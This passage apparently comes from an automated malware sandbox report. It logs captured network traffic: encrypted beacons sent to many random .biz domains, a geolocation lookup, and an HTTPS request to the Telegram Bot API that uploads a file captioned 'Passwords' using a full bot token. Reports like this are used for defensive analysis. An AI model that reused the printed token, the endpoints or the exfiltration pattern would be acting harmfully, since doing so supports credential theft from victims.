                                                                                                                                                  Dec 10, 2024 16:24:30.031089067 CET850OUTData Raw: 4f 64 6d ab 51 ea 70 1f 46 03 00 00 2c 86 d0 2f e6 ca 0e 8d b5 ac c7 67 37 d4 ef c1 ad 67 60 9b 0c da e1 36 08 37 3c f6 84 49 e8 6f 28 6b 50 b4 0e 90 9b f2 3f 89 b7 25 3e 73 f3 fb 44 53 b1 19 3a 9a 2c ae 76 b4 e1 e8 cb 76 27 a0 51 be ee 36 53 9c
                                                                                                                                                  Data Ascii: OdmQpF,/g7g`67<Io(kP?%>sDS:,vv'Q6SK@%*pq8V!@s;cuM:IwpN W4OT,YRfXPE"}JL>zqZWKnIz3jfBlncQ,yw8EZ.JV0&!
                                                                                                                                                  Dec 10, 2024 16:24:32.045830965 CET412INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:31 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=6109d80e9b4564a356edadc5011f2a64|8.46.123.175|1733844271|1733844271|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  10192.168.2.74976382.112.184.197806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:33.760775089 CET346OUTPOST /hncx HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: lpuegx.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:33.760775089 CET850OUTData Raw: a2 09 ba a8 cd c1 28 db 46 03 00 00 c1 4e bc 6f a6 21 6b c9 55 13 2b 9d 2c 82 a5 6e 44 1f ae 9f 12 3b 91 a3 3f 38 d5 ba 52 9e d0 dc 14 90 a6 d1 76 19 48 62 34 00 86 15 8c 17 91 4c f4 4e 4b 58 bb f6 d2 2e ce 18 1c ff c2 d5 d7 7e 76 e0 33 ce d9 d0
                                                                                                                                                  Data Ascii: (FNo!kU+,nD;?8RvHb4LNKX.~v3nm,iG|!;MeqX$S)H<7@h'g9%2/z>OrY5 A%+QM.s_DF{X!b#H*e>?|isYYRd>T9


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  11192.168.2.74981582.112.184.197806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:55.833528042 CET355OUTPOST /fprrydnqfsccl HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: lpuegx.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:55.833553076 CET850OUTData Raw: ac aa f9 63 96 5f cc 5b 46 03 00 00 81 39 1a 84 4f ed fa 8b dd c8 bb ba e5 ab 65 32 43 e1 e1 d3 0e bc ef 56 00 05 19 71 fb a6 51 45 94 04 55 67 f6 74 e6 7f 7c a0 3b 51 e0 31 2a c6 2a 83 dc 83 29 18 3c d7 ae f5 3e 2f d0 7b b5 d7 f9 16 ce 87 c1 af
                                                                                                                                                  Data Ascii: c_[F9Oe2CVqQEUgt|;Q1**)<>/{{)e8|YoPI4@b^9`?,-l~OGs-gd\CWdA?^-a.cZXhG||C5~ah=


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  12192.168.2.74987282.112.184.197806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:25:19.263192892 CET347OUTPOST /kp HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: vjaxhpbji.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:25:19.263308048 CET850OUTData Raw: a1 22 ce 6d 1d 18 f3 30 46 03 00 00 62 81 ab 6a 2d f9 c7 6e 20 41 8d ee 0f 50 04 05 0c 6f 1e c0 c4 6e 44 b0 e7 02 f4 0a 6d 14 32 02 01 a5 95 58 15 7a c9 e0 ea e3 c9 0a 88 9b e7 2a 00 8b 5e c1 71 03 6a b7 54 91 72 d0 64 28 d6 82 e6 e1 f0 e6 f4 a1
                                                                                                                                                  Data Ascii: "m0Fbj-n APonDm2Xz*^qjTrd(OS0/Q4RSzS`9K>6fl/)9Bf(XC'oP7+L1/d+0%~'T%gCc40jN<>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  13192.168.2.74991682.112.184.197806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:25:41.324840069 CET350OUTPOST /hptny HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: vjaxhpbji.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:25:41.324919939 CET850OUTData Raw: 74 01 c2 33 f2 f3 e7 14 46 03 00 00 72 c0 c9 ef 2e c2 d0 db 9e aa 08 6c f4 ab 64 7b 3d 11 ca 07 b0 1d 5f 71 d7 84 d7 fe 02 0a 60 69 68 d1 01 51 02 74 80 51 6b dc 2a b6 02 cb 39 d6 7e 79 21 32 7c 3d dd 19 80 7c 57 2e ee ca 7b 66 42 c0 12 c1 7d a6
                                                                                                                                                  Data Ascii: t3Fr.ld{=_q`ihQtQk*9~y!2|=|W.{fB}M~udv=$qxulVk;UK6J<j]*t_-8@s};I>P)G5Y*Y]MR'mT'"S0hc7<?u'Q[!Z5


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  14192.168.2.74996647.129.31.212806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:26:04.881828070 CET358OUTPOST /sqemlirtfccimfo HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: xlfhhhm.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:26:04.881864071 CET850OUTData Raw: 4f a7 b7 e8 24 37 1a cb 46 03 00 00 9c bf 34 91 89 ec 13 2f d9 91 da 8e 4c c6 f4 0c a0 26 7c 85 55 7b 67 ae 27 ec 56 64 10 a1 1a 88 5c f9 9d ec c1 91 d1 58 ae aa 46 49 7e e1 f0 71 f1 22 11 a0 4e 0f c3 f3 7c 91 a5 c3 50 d9 98 59 a8 f0 fb 03 ed ea
                                                                                                                                                  Data Ascii: O$7F4/L&|U{g'Vd\XFI~q"N|PYYGJm]=0`{lc~YBY *Qe30Iv7T7QrP/6)9z*#UY$~=0^lz'b]AD
                                                                                                                                                  Dec 10, 2024 16:26:06.959920883 CET411INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:26:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=0bb489b072230014809904507c25a33b|8.46.123.175|1733844366|1733844366|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  15192.168.2.74997213.251.16.150806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:26:08.098440886 CET354OUTPOST /vcyisuboorqd HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: ifsaia.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:26:08.098464966 CET850OUTData Raw: db a9 cf 1c aa 96 3e 6f 46 03 00 00 84 d7 4f 72 07 15 45 8a a8 66 11 bb 63 94 c1 53 7c 50 9d 8f 1c 60 87 bf 7b 02 6e 0c 7d 9a 87 2a 0a f3 0c e2 b2 48 e2 80 32 51 1d 55 bf b2 c0 3f 70 65 b3 ea 93 c3 80 6c 9e dd 1e 46 5e ec 91 15 99 de e9 81 44 03
                                                                                                                                                  Data Ascii: >oFOrEfcS|P`{n}*H2QU?pelF^D-x0 (wO\&w|QG%g}P$_ >@tGYwO3*qkiaa!>_.r77h'H4Z?LA%#A4fMwJ95f
                                                                                                                                                  Dec 10, 2024 16:26:10.184322119 CET410INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:26:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=21c087b90081b79c3106bfe3b46d814e|8.46.123.175|1733844369|1733844369|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  16192.168.2.74997844.221.84.105806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:26:10.914565086 CET350OUTPOST /peioi HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: saytjshyf.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:26:10.914565086 CET850OUTData Raw: 08 93 b7 70 8b 54 dc 11 46 03 00 00 28 21 7b e9 3b 82 bb 70 bf 8e c3 39 f0 f8 4b f2 fa 19 c9 f4 b0 55 9c 1b 76 a0 8f 21 7a df 8c 9e 4f af 3c 75 1e 89 22 13 4a f4 8d a9 c5 f6 d8 e9 91 2f 0e 68 4a a9 08 f7 1a 84 a3 fd e0 25 10 d2 17 79 77 d0 82 e2
                                                                                                                                                  Data Ascii: pTF(!{;p9KUv!zO<u"J/hJ%ywxkWH4n}K,{@I,LvnAKi$_.TiN7{d+(RA;PuxK0E;+PT4^[yOVIf,B&:mapQ:5
                                                                                                                                                  Dec 10, 2024 16:26:12.340123892 CET413INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:26:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=e1faa78bea3315d74f47f9b6ae36d659|8.46.123.175|1733844372|1733844372|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  17192.168.2.74998418.141.10.107806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:26:13.685950994 CET349OUTPOST /ymdlhl HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: vcddkls.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:26:13.685950994 CET850OUTData Raw: cb 0d d3 11 17 76 ef f2 46 03 00 00 a4 75 1b 6f 81 8d 53 85 54 90 10 93 fd 11 4c 2f 68 1c 6b ce 46 48 17 07 fd c0 89 d6 ae f8 65 bd 24 d1 8f c4 92 f1 9d 58 1f 3e ab 90 4b 6b e2 81 55 88 1b 16 70 1e 11 75 38 81 8b fb f0 93 35 a3 20 63 0f 2a ea 1d
                                                                                                                                                  Data Ascii: vFuoSTL/hkFHe$X>KkUpu85 c*92&tU;%|$$.8p/HC\4CdCV[4I\RD-63]X>pM2;C(/FZt1<W9\[r>u8yb5M%f^T&a
                                                                                                                                                  Dec 10, 2024 16:26:16.152347088 CET411INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:26:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=09dc52fa23dca1182baa6c7e488ff8fb|8.46.123.175|1733844375|1733844375|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  18192.168.2.749990172.234.222.143806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:26:16.889905930 CET351OUTPOST /mepglnjkcg HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: fwiwk.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:26:16.889938116 CET850OUTData Raw: be b7 2b 64 ec e9 a5 04 46 03 00 00 f9 74 98 00 e8 81 18 fc dc 4a b0 8c c5 5e b0 1f 6e c3 bd 62 a0 94 c1 ab 5a bb c6 df 49 06 0d c8 df d5 f1 85 ac 6d ca 8a a7 e5 55 22 74 be 12 aa d8 6f 86 44 72 91 b2 55 57 a4 55 8e 62 cc 89 34 6e 3d 13 9d 54 f4
                                                                                                                                                  Data Ascii: +dFtJ^nbZImU"toDrUWUb4n=T){0.~bggS5iu`9/eVfbR^Tce#"eV+BxZ=xGD#uDpC$gK<fcn!JOSZC?EkC
                                                                                                                                                  Dec 10, 2024 16:26:17.973221064 CET470INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:26:17 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 142
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                  Location: http://ww99.fwiwk.biz/mepglnjkcg
                                                                                                                                                  Cache-Control: no-store, max-age=0
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  19192.168.2.74999572.52.179.174806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:26:18.338757992 CET334OUTGET /mepglnjkcg HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Host: ww99.fwiwk.biz
                                                                                                                                                  Dec 10, 2024 16:26:19.515204906 CET282INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:26:19 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Location: http://ww12.fwiwk.biz/mepglnjkcg?usid=26&utid=9416613129
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.749715104.21.67.1524432724C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-10 15:24:18 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-12-10 15:24:18 UTC873INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:18 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 23581
                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXY4CgA4DZAgBeZzJoLGYT8Q3h7dxmVnR9fItUy9uto7E2fafn2deeQquBAMau9M%2Fsn5PRvlA3NftDnMHunW8ZQjMOhI8qXkRBPQT4MxKHSxclTRNTZDKouaApbtT%2FC5rjtm83N0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8efe3db7abc332e2-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1795&rtt_var=701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1531200&cwnd=159&unsent_bytes=0&cid=ff8754c2d0defbdc&ts=460&x=0"
                                                                                                                                                  2024-12-10 15:24:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.749736149.154.167.2204432724C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-12-10 15:24:26 UTC299OUTPOST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1
                                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1904d11bd5d8
                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                  Content-Length: 1090
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-12-10 15:24:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 39 30 34 64 31 31 62 64 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                  Data Ascii: --===============8dd1904d11bd5d8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                                  2024-12-10 15:24:26 UTC388INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:26 GMT
                                                                                                                                                  Content-Type: application/json
                                                                                                                                                  Content-Length: 518
                                                                                                                                                  Connection: close
                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                  2024-12-10 15:24:26 UTC518INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 31 34 31 35 36 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 33 37 35 35 30 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6d 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 38 34 34 32 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 79
                                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":428,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1733844266,"document":{"file_name":"Userdata.txt","mime_ty


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

